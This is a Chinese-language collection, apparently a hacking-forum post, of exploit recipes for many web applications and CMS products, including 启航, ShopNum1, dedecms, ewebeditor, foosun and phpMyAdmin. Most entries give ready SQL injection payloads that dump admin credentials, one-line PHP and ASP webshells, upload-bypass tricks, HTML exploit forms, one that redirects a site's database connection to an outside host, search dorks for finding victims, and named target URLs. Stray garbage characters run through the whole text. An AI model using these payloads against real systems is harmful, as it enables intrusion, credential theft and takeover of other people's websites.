启航企业建站系统 cookie注入漏洞通杀所有版本( {0 U% ?7 o, w2 f, a" A, G
, D: O/ ?5 u) r7 _ |8 C; ]
直接上exploit:, h) _; t; d4 l6 k
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
4 L& |9 |1 ^& A( {# ]. Ftest:http://www.tb11.net/system/xitong/shownews.asp?id=210! _: o+ k) I6 U5 P3 w, |5 D" S
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------4 p( [! S" o, C
Asprain论坛 注册用户 上传图片就可拿到webshell) o# o8 A+ h/ H8 M2 L7 Z' _
3 J: f4 Y- }( y5 K! S* c- f. M3 T
Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
9 T0 q2 ~% @ j1.txt存放你的一句话马 如:<%execute(request("cmd"))%>! N. _) G1 k% n" J& a, `% o+ w9 Q5 G
2.gif 为一小图片文件,一定要小,比如qq表情图片
|( u! Y d, |3 M1 Y3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用
?, u' `7 A/ d) U3 k5 u4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了( M6 [- p$ N. @. m
5.q.asp;.gif
6 k* `' Z3 ^$ Zgoogle:Powered by Asprain, S; q% V& n# `& w
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( L! I8 J1 P7 B7 w- M) B
$ v" { R! U" \7 C& b' X& EShopNum1全部系统存在上传漏洞。
9 S% c/ v, S0 L) _3 H6 G2 F2 v" J L( s
首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。4 C$ s; b/ y" @2 t
按说明 提示登录后台。。
/ n, M1 Q- M* a1 r w在后台功能页面->附件管理->附件列表- O3 }' t4 s# i
可以直接上传.aspx 后缀木马
) A j! L; U9 d1 S; ahttp://demo.shopnum1.com/upload/20110720083822500.aspx
* ]9 ]; c. L# ]/ u: S H: t# u--------------------------------------------------------------------------------------------------------------------------------------------------------------------------, k7 f/ }- O0 L: y/ C+ c- W
7 k+ H8 b: A7 s: R
牛牛CMS中小企业网站管理系统 上传漏洞7 f w: g- b( O: Q
" a2 u/ N& G% V: q' Z
牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。3 `7 C0 S! {6 J* a6 ~2 Y
后台:admin/login.asp
}" [6 s, j1 Z4 @ewebeditor 5.5 Nday
- A8 m4 I% \# N& P7 x9 P9 j2 Lexp:4 L% K, K8 r$ y( L( x4 M
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?& B/ { D1 z4 P3 R
<input?type=file?name=uploadfile?size=100><br><br>?
% w3 _7 B" G% i' n$ h<input?type=submit?value=upload>?
5 X; d0 ]! s, w* H% C3 Q$ ~/ O</form>9 `$ }9 u; Y3 i4 U) d7 D! {8 H
ps:先上传小马.
( ]0 ~$ y C0 X0 D8 }' d& k0 L, `- E& zinurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏3 G5 C" Y3 Q5 U7 n6 d- V4 V
0 J& ~' f2 a* A# A7 A# [. y
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
5 N: ~& `# F) h' g
' V0 G7 F, \- P1 o# BYothCMS 遍历目录漏洞* e, g# a+ p, q. d7 D
4 `. R/ \ e. G" C) g# l优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。! ]3 O2 _0 V. N) P: [4 J' |& y, w
默认后台:admin/login.asp$ e* }2 m' \1 ]- X/ B L
遍历目录:
7 G7 O/ {( i- W: }" {3 |ewebeditor/manage/upload.asp?id=1&dir=../7 M2 _! v* C0 L
data:
8 |+ n+ u' F' X" j+ B- }/ uhttp://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa
8 m% e/ V, D) e--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# u& V# h( ]4 \0 Y1 p2 ?! V) u2 E, l) x$ J: k
Net112企业建站系统 1.0
, p( k! h6 _, s& b
/ a% h# a1 J3 E; M1 i x* a. b* p源码简介:
7 {: ], h3 E7 w1 U, KNet112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。( a g1 ?8 c0 }
添加管理员:% L: p4 R% K9 N
http://www.0855.tv/admin/admin.asp?action=add&level=24 c# V% }* g5 b4 j% K3 ]& D3 S
其实加不加都不是很重要,后台文件都没怎么作验证。' a. B' [: W+ W5 p$ X; @$ ]
上传路径:, {" {, D" ?5 V1 ^( X; n
http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200
e8 ^4 ]& ?3 L4 c0 Y6 f) @5 Whttp://www.0855.tv/inc/Upfile.asp?Stype=22 c2 }+ d0 g r3 ~
怎么利用自己研究。. u8 y! `2 I9 M5 g4 E. @6 F
遍历目录:- c h1 T$ S7 y: K, T# V
http://www.0855.tv/admin/upfile.asp?path=../..' ~6 x' Z- o" c+ q/ h% R3 ?
如:; i' D0 q7 l5 ?/ E+ g0 j
http://www.0855.tv/admin/upfile.asp?path=../admin
S% A, I+ C! t* J9 ^7 N" Vhttp://www.0855.tv/admin/upfile.asp?path=../data; z7 H! t* F6 |9 d0 ^
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
) u$ A- I. U, ^8 D& j( ?+ [( B- V- e' D5 {0 w# Y- o
易和阳光购物商城通杀 上传漏洞1 ^/ x2 c4 C( @2 I" [
' G3 k! M9 Z3 d( K前提要求是IIS6.0+asp坏境。
3 R# u# o: c/ Q漏洞文件Iheeo_upfile.asp / n# I( N; K' g( X5 T9 t! l1 I! @
过滤不严.直接可以iis6.0上传3 r; ~4 ?/ N E1 I" H% P
把ASP木马改成0855.asp;1.gif" X6 a- X& V' P
直接放到明小子上传! k7 t& [% a) k, j! x" o" i
Google搜索:inurl:product.asp?Iheeoid=
7 g0 ^7 K5 n, c2 j3 k--------------------------------------------------------------------------------------------------------------------------------------------------------------------------4 N; o1 v- k- i$ h
0 K# d, J1 O9 M8 Q' v8 Yphpmyadmin后台4种拿shell方法- Z% |0 \9 o; A1 @
7 e8 H: I$ j7 p, z& L, J
方法一:
! T u0 Z* _/ A% x" p" K8 ~CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );2 B% Q4 ]+ l" f. N0 h a" s
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
5 |8 {1 }0 `- TSELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
5 I# J0 q- d0 b; |# v----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php G# X0 m9 X: Q, \6 `) L( b
一句话连接密码:xiaoma9 Q( v1 S- ^* q( T+ e1 m
方法二:
) |! \! J9 V9 }' GCreate TABLE xiaoma (xiaoma1 text NOT NULL);$ d* ]: m# @5 p" R6 K# |4 N
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
0 ]- i/ _9 p/ R+ `+ ]select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';; o. W" q/ K$ t6 D; |9 X
Drop TABLE IF EXISTS xiaoma;4 @5 _, C2 Y, }4 ~
方法三:- x. R4 i0 ~" `% h
读取文件内容: select load_file('E:/xamp/www/s.php');2 z7 o( O- ?9 g+ f
写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
7 @& k4 ^( g. wcmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
4 `+ |! |% \) k6 v- d# R方法四:
" A$ O B& C# ^/ }; @4 t7 rselect load_file('E:/xamp/www/xiaoma.php');2 y, `2 ~6 z' f, x$ e% _- T6 M! h
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php' @% x+ \( I; h: @' y; u
然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir
, }! `' y! i" | J0 v' K# R--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- Q0 k8 q$ |( x {& N" K
) A9 ?9 B- i! N% Z& H传信网络独立开发网站源码0day漏洞
9 b& A1 F& B$ O5 {- F+ a6 s0 s$ Q" e [- E
后台system/login.asp& o& ]- k! Q4 B" V' M8 h2 R5 N
进了后台有个ewebeditor. P+ H" R5 E" E% y7 r4 h
Google 搜索inurl:product1.asp?tyc=
1 N( _- [; f. Y7 Z9 B编辑器漏洞默认后台ubbcode/admin_login.asp
3 z2 W6 d; x7 ~! f数据库ubbcode/db/ewebeditor.mdb
+ F7 j' V* }( D2 l& F' k默认账号密码yzm 111111
: l L3 ?$ H9 v; P
9 u7 j# S$ |; { C( [: a拿webshell方法) d8 g$ Y& r" Y* n! @+ T
登陆后台点击“样式管理”-选择新增样式 - y! V+ \4 _8 ?" M7 Q% g
样式名称:scriptkiddies 随便写
7 h4 Q0 t+ t- G* z: f路径模式:选择绝对路径 * Z+ B5 N4 Y' Y0 D7 c
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx, b; `) K* O/ H8 f: S) c& w$ I5 S
图片类型比如就是我们要上传的ASP木马格式# |6 x1 L$ t' H9 q! }3 L% k3 Q% n
上传路径:/% k5 C4 d9 M2 b, i) T
图片限制:写上1000 免的上不了我们的asp木马
$ C4 G' y! N* \* s8 f上传内容不要写
+ m! F1 u& {5 _: h) T; S可以提交了
5 \3 O8 _2 J9 [4 [* Q样式增加成功! ) [/ d! z, {; L4 y. n, a6 a
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
& { Y" g( S0 O按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置7 R, [! L$ c* L# K. M( a- H4 _
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
. d, P3 E: O* e, {! N* t; }上ASP木马 回车 等到路径
% p" g6 }1 S8 @/ n" Z$ f" |; f4 c# ]. t. w( E4 h
后台:system/login.asp5 c: J# K, |5 P$ E; S
Exp:
! _: e: L# L4 Hand 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
% }9 s% O1 ~" ~测试:
. ~% @. I/ b8 ^5 c: H5 ohttp://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master* M0 F' {) g' {* ~- r" Y
http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master" ~8 N, P+ Q* J( ?: ^
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
5 ~, H. V; [3 k' I/ v0 Y$ T7 a8 d$ q* }# T$ c! v* p
foosun 0day 最新注入漏洞
! u6 C- T- V' f# M$ J( A$ q0 t8 b y4 k T( k6 u
漏洞文件:www.xxx.com/user/SetNextOptions.asp
& M5 N' \" _4 S利用简单的方法:
% G6 M$ W Q6 M# L0 ]' ^% _暴管理员帐号:6 Y: i4 ?+ b* I+ B% L
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
) N$ S7 h0 I* N# m+ I8 g" T暴管理员密码:
. R1 t/ a$ J! o3 R7 }+ w) Bhttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,
& S b0 x. D$ O3 C' k$ G--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( R' A5 l* e0 T, X3 W! T& _
8 t" Y1 b: Q1 G0 ^0 K( i网站程序的版权未知!) T. J/ G, R* I% B& T' o
: ]6 R" t+ R& Q( q& w默认网站数据库:
4 g& U+ m5 ? p5 ~) kwww.i0day.com/data/nxnews.mdb3 ?; a0 A2 q- Y3 z# S
ewebeditor 在线编辑器:, T4 u/ \* Z0 e" C. i
编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb
5 T/ f9 H; W/ y# w登录地址:ewebeditor/admin_login.asp
* c: N5 w( h1 N# O& `默认密码:admin admin4 o, ^* E: c) { z& L9 Q8 _
登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
. ]% H+ B+ j9 K; Y6 E" J: `8 m, Z- ]- _5 O8 P, b+ i& a
Sql注入漏洞:. i; A# L) l6 }" `8 z; x2 N
http://www.i0day.com/detail.asp?id=12
; s( k% H2 o/ M! e. R* nexp:
3 D$ S* h' k7 p2 d% R, V& n& V: punion select 1,admin,password,4,5,6,7,8 from admin
$ k* R+ F e; t5 d; P爆出明文帐号/密码' g) u1 z# T* i
6 u$ q" E1 ^1 D2 W# i Z
上传漏洞:
5 x" g) T5 U2 G/ C" N! i后台+upfile.asp
5 ~7 `' c5 B# W' m3 K- D' H; j如:
1 t5 q( L, g7 I$ |/ D( D* R% @http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。
9 x- U. c( B* rshell的地址:网址+后台+成功上传的马0 h* k9 ^2 p; k% Z- ?% W
google:inurl:news.asp?lanmuName=3 ^2 v; N4 g( U D6 |. g2 ^
------------------------------------------------------------------------------------------------------------------------------------------------------------------------6 _9 Z, ^: }2 J# C0 ]5 w; ]
( Z7 e2 I( k. gdedecms最新0day利用不进后台直接拿WEBSHELL
: Q' s5 n1 g! z
- r: ]2 G* F* O( K/ U拿webshell的方法如下:
9 ` L# X" C9 i) {3 t网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.: S4 E ]0 w$ B, I0 Z7 K
前题条件,必须准备好自己的dede数据库,然后插入数据:" a; o+ [ }2 Y" q+ I
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
9 W ?- o- L0 d- {3 s- x# T8 |, A/ c6 ^9 B9 f4 r! j9 E( W# u# X3 R
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
1 e# E$ y) ?9 [<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
" ?5 f6 F% O" K% N$ k8 v0 V; }<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
$ U+ z; q0 O+ r! ]4 o* h5 `- Z<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />: B; M: D* P: K
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />; h" _4 @2 \# m+ ~# R( h" g
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />! o d0 }& A/ @$ h, G1 S3 c
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />2 y- ^9 G$ U% Q! J, _' O s- x0 `
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />4 Q( }& c' Y) c7 j) ]8 C- s; q
<input type="text" value="true" name="nocache" style="width:400">3 H5 Q) h( K) ?2 {) ~
<input type="submit" value="提交" name="QuickSearchBtn"><br />6 `% `- @* h% v% U _; {
</form>
8 M7 m! l8 W# f, F/ N) {2 M* z% C<script>* C+ o( C! o2 J4 w' k) U
function addaction()
/ m; t6 Q/ M4 d [( O7 j3 d{) l# d& Q# a3 O* c% \+ s% S& B
document.QuickSearch.action=document.QuickSearch.doaction.value;
s- b. \! q4 D7 f}
8 i4 G8 B6 F5 s6 _8 |</script>
5 u5 S T5 {5 ?' p( w0 p-----------------------------------------------------------------------------------------------------------------------------------------------3 P% l: p8 F% A- B0 q. q
; p0 B# [* |( N- F4 Pdedecms织梦暴最新严重0day漏洞
7 Q b N, _9 I- Bbug被利用步骤如下:
+ ~' Q1 F( K7 E4 z* m8 {6 R+ Nhttp://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
$ `9 Y+ P& w" _$ f# C# D2 @! S把上面{}上的字母改为当前的验证码,即可直接进入网站后台。! ?& ]9 u0 n6 m- V. m
-------------------------------------------------------------------------------------------------------------------------------------------
4 D" D9 H/ Z# I0 ]# E9 V; T( j* [
" U2 m; W6 p \2 t多多淘宝客程序上传漏洞
( o8 h! A* {7 n6 Z1 `' m4 H; H8 J漏洞页面:. |, [- X0 ~. F
admin\upload_pic.php% d: s9 }3 ~0 w1 x+ M# ?5 N
传送门:
& @/ Y. `% P+ _9 jhttp://www.www.com/admin/upload_pic.php?uploadtext=slide1
W" W0 f' G1 d( o0 F3 ^. mPS:copy张图片马 直接 xxx.php 上传抓包地址!' G' w7 W' X/ i/ q! N# w
------------------------------------------------------------------------------------------------------------------------------------------------------3 F& U/ Y: N( ?; q0 s% m+ ^/ @- U
/ ?4 y5 n1 R' b' }1 e" b1 P
无忧公司系统ASP专业版后台上传漏洞
# A, m4 I6 k0 o. B, I# ]漏洞文件 后台上传
8 Q$ b" |6 }1 g. Wadmin/uploadPic.asp; C+ l Y4 m! D6 ^$ n6 ~
漏洞利用 这个漏洞好像是雷池的
" l9 t4 n7 z( ?2 Z: jhttp://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1
# @. N5 r' A3 s等到的webshell路径:6 e. b; X# B6 f7 h
/UploadFiles/scriptkiddies.asp;_2.gif
" {2 x9 C4 m* e, p' }$ `---------------------------------------------------------------------------------------------------------------------------------------------------' D H) x6 T q1 ~: d/ `. ^
7 X) P, D/ j* A( w! U$ a+ W" g住哪酒店分销联盟系统2010
% Q0 z1 k6 v: VSearch:
- t2 T& p: M6 u3 E9 }9 T" [: yinurl:index.php?m=hotelinfo
6 n( ?, |- p yhttp://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
4 W8 _7 f W. N: v4 _) c1 O7 H8 `默认后台:index.php?m=admin/login- L4 ?( ^% w. n3 N1 ^% B( S
--------------------------------------------------------------------------------------------------------------------------------------------------9 [$ I1 B4 _& r: C+ m
" a% A4 |3 e6 b i0 ^3 finurl:info_Print.asp?ArticleID=: @$ d# Q+ }; E) U$ d$ S! o5 q
后台 ad_login.asp: | b2 l$ n% O+ \6 r% f) ]0 J
爆管理员密码:1 l6 w5 ?$ c8 u; Z/ G: }% V. |
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin% ]: m" ~' B5 f6 `. }7 s, f4 O
------------------------------------------------------------------------------------------------------------------------------------------------------------. n3 _8 B9 m+ O( R% {
, M' o+ O8 C3 {. p2 b5 e5 @0 K% T5 y搜索框漏洞!
0 L5 @) ~3 w; p6 e" v( f q4 n%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
4 K4 j. ^/ r& d4 y: D* o--------------------------------------------------------------------------------------------------------------------------------------------------------
, n. x" Y3 h. k/ I h: Z5 {# R! @7 f' O. p5 ~7 T+ H
关键字:
2 B" S, k3 X5 Y4 P6 m: i) m9 g; ~inurl:/reg_TemletSel.asp?step=2
6 R. | ?5 }$ i, y( H3 W1 K或者% L/ I" S% n1 D) f1 H6 n
电子商务自助建站--您理想的助手7 E( h6 n U: ^: E* s2 x0 K: V
-------------------------------------------------------------------------------------------------------------------------------------------------
8 \2 ~. F5 n0 q/ r$ @
5 S0 U8 [3 c2 ~% H. oiGiveTest 2.1.0注入漏洞2 P6 f( e3 y" X x
Version: <= 2.1.0
) e2 E: S& ^( { B! a# Homepage: http://iGiveTest.com/% v) z( }1 }4 M$ }
谷歌关键字: “Powered by iGiveTest”* G. z" J1 i* Y$ P& X
随便注册一个帐号。然后暴管理员帐号和密码: w; P- }8 D9 B! Y- t2 p8 o' k1 b0 H
http://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
- a5 L( n/ ^/ v5 p; P------------------------------------------------------------------------------------------------------------------------------------------------
6 z# R6 d9 y% B4 y4 p: R" V: D6 J
CKXP网上书店注入漏洞) e y9 I* I; f, L; A w" W
工具加表:shop_admin 加字段:admin
# O4 X& l K! M9 R后台:admin/login.asp 5 U1 k# e$ O: m
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/9 ?$ v( m8 o6 V2 s" \: R+ W3 D- _4 D
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息" J. v% o5 x- ?! @/ C
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
, _+ e& U; \: g0 x% ^- e
2 p, [# l: L9 L, U段富超个人网站系统留言本写马漏洞
, K* T/ o p2 z& C: B3 E" Q源码下载:http://www.mycodes.net/24/2149.htm* w R1 s0 F% d8 j# H
addgbook.asp 提交一句话。- \7 W1 M2 z; e9 s U* a# v
连接: http://www.xxxx.tv/date/date3f.asp
8 l8 r3 ?4 r7 G% R1 @7 K* j% wgoogle:为防批量,特略!9 `- W; D! g. h& N4 G$ U
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ J2 a, n8 l. w6 q) Y
0 ]# `! I' B5 V! m$ S2 ? W" U- o
智有道专业旅游系统v1.0 注入及列目录漏洞. o2 `! \3 _/ v$ m" S3 B
默认后台路径:/admin/login.asp
: z8 Z2 R8 Y- L3 K默认管理员:admin
) P* h: l% N3 c' l% d& A默认密码:123456" m; [# y+ w* u5 B0 m& E) J% {) D+ o
SQL EXP Tset:
! d; ^ |) o( T" v" ~http://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
' V5 e. W6 t: P1 }! ]------------------------------------------------------------------------------------------------------------------------------------------------------------------------% e) K$ ~2 o$ ?
6 I- m7 w ]7 a5 O- v* lewebeditor(PHP) Ver 3.8 本任意文件上传0day
: v/ I) C! N/ ~8 r z+ iEXP:
, d! [, P6 O9 v<title>eWebeditoR3.8 for php任意文件上EXP</title>, w& j( ]6 o. s5 h" r
<form action="" method=post enctype="multip
5 d1 G% B# y3 r4 Z$ W S) m1 bart/form-data">
* u; ~- o3 t6 b: a6 j% R<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
5 t2 m9 }# D; M$ J8 IURL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
1 }, k q+ P& r( Z2 d9 H& X; \$ l<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1"> ( L% J, E* J" s& ~4 R* l; b* ^
file:<input type=file name="uploadfile"><br> # R( J0 n! l8 u" T/ P
<input type=button value=submit onclick=fsubmit()>
0 J0 u2 N) Q7 o+ B/ K</form><br>
9 p+ O$ q. |! Y0 w3 g- J<script> 3 B2 F% ?( n' g5 E+ F* |- K8 k
function fsubmit(){
+ b* L6 a7 ^8 b S/ lform = document.forms[0];
/ y o0 @/ X: l# |4 d4 B. qform.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en''; 8 Y3 R1 m, ^+ N- B" V
alert(form.action); - K1 d+ y, L4 H+ x6 a5 y/ E
form.submit();
. Q: y9 ?/ Z. v" R! J} 4 t' E8 j/ b- [; E5 y* O8 e. B, F
</script>
9 f V% s8 A% q/ A( W8 n* H/ o$ S注意修改里面ewebeditor的名称还有路径。
9 T* p' O6 O" C---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
B. I- q6 _$ h$ T+ r3 F8 W
& M, q7 p! B3 L% a. B提交’时提示ip被记录 防注入系统的利用 S5 U; m1 s1 H, {4 v. l
网址:http://www.xxx.com/newslist.asp?id=122′
2 _; ]2 E$ q5 I5 s4 A* c. U提示“你的操作已被记录!”等信息。# O: @& C0 F% o9 z# a" C9 j
利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。
0 Z; @1 y" ?& C8 Q" ~: f4 F5 I-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------; ?& o, J' Q7 d& `
* e; k! }( l2 y$ N西部商务网站管理系统 批量拿shell-0day
: Y- V2 D' I1 A# j$ B这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
/ y* T0 @. Y4 V1 }6 E$ Q0 k- Q1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛) O7 ]1 O( _9 e$ m6 o
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
" S' e9 C2 q9 M9 K3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
. S0 x2 z! k4 v; H# _' \. R---------------------------------------------------------------------------------------------------------------------------------------------------------------------------! u( f8 @, K. m( l$ h' [8 j
/ M# ^% U! f6 w
JspRun!6.0 论坛管理后台注入漏洞
) P6 h$ l" m5 M0 j% o4 p) F
* e: J! e( C, vSEBUG-ID:20787 发布时间:2011-04-30 影响版本:
% y2 u/ H, N" I$ K; X5 S L& F% |2 {JspRun!6.0 5 u+ c' V3 e: K# U- p7 m7 J
漏洞描述:
5 m& ?1 `, s) Q/ h' o2 tJspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。
$ U. W$ ~7 k) C, n& T- w) I在处理后台提交的文件中ForumManageAction.java第1940行
! x, h i3 C! GString export = request.getParameter("export");//直接获取,没有安全过滤+ A# Y0 ~7 m8 |( n, l
if(export!=null){
4 D9 `( p, c4 I& u R8 S! YList> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...
}! E( ^ Y# L4 G% u: Mif(styles==null||styles.size()==0){- o g& C9 w5 j- ]
<*参考/ S+ F' m# @5 p
nuanfan@gmail.com* ^3 o% a5 q, S! E
*> SEBUG安全建议:
% t# L8 u7 y- ?" W/ U% n; pwww.jsprun.net: h0 X% x$ s- F/ w4 b4 z
(1)安全过滤变量export
+ [! y% Q7 |9 U. k% o4 }2 Z(2)在查询语句中使用占位符6 c, T, }; }" y6 W H
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------4 t, G# R6 V) x+ j
$ M7 }9 b6 d% k H3 L8 I R
乌邦图企业网站系统 cookies 注入
. P2 u$ Z- w% _! d, U) F) d! [- E" X) y
程序完整登陆后台:/admin/login.asp
" k X8 e1 o6 l# O默认登陆帐号:admin 密码:admin888" h) y) u& Z$ A% Z) N, o
语句:(前面加个空格)) y6 E. f. a1 J
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
: a: `$ M7 b/ M" A* ?或者是16个字段:
`! E8 a: ]6 ~( ^& ~( Nand 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin. }& \$ i* u7 X
爆不出来自己猜字段。
8 B2 h. @/ w; b/ ~# b/ Y, `5 ^注入点:http://www.untnt.com/shownews.asp?=88+ N1 J" u4 l' H& w \9 p9 F% S) k
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp" y' n. E* x' t$ c! x% R
关键字:* B1 G. y* E, C! I4 Z
inurl:shownews?asp.id=
0 B$ a+ n5 g! E! X-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------) n. j" Q( Y) X( V" u. p
+ _( E4 g' j+ \. D9 e7 m
CKXP网上书店注入漏洞
" |) u- G; t J' k, ]8 B3 M- {: F0 ^- ?) p/ q" \
工具加表:shop_admin 加字段:admin; N# P8 g4 f6 H. s& q
后台:admin/login.asp
4 B3 Y7 ~# ^' p. J8 u& U$ x登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/9 C: g; B( }% `4 k! \2 y
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
5 O3 ?+ n V6 S/ {' u6 e; w---------------------------------------------------------------------------------------------------------------------------------------------------------------------------, y% D# C/ V- h# J* V0 f: m% }
. f6 J) t* w1 K; J. X% ~( x, N
YxShop易想购物商城4.7.1版本任意文件上传漏洞
1 ^- W! l% X0 d1 w! z5 y5 Q3 { k! w) v' [* W
http://xxoo.com/controls/fckedit ... aspx/connector.aspx
; `" k6 S# @) l, b6 r' S跳转到网站根目录上传任意文件。
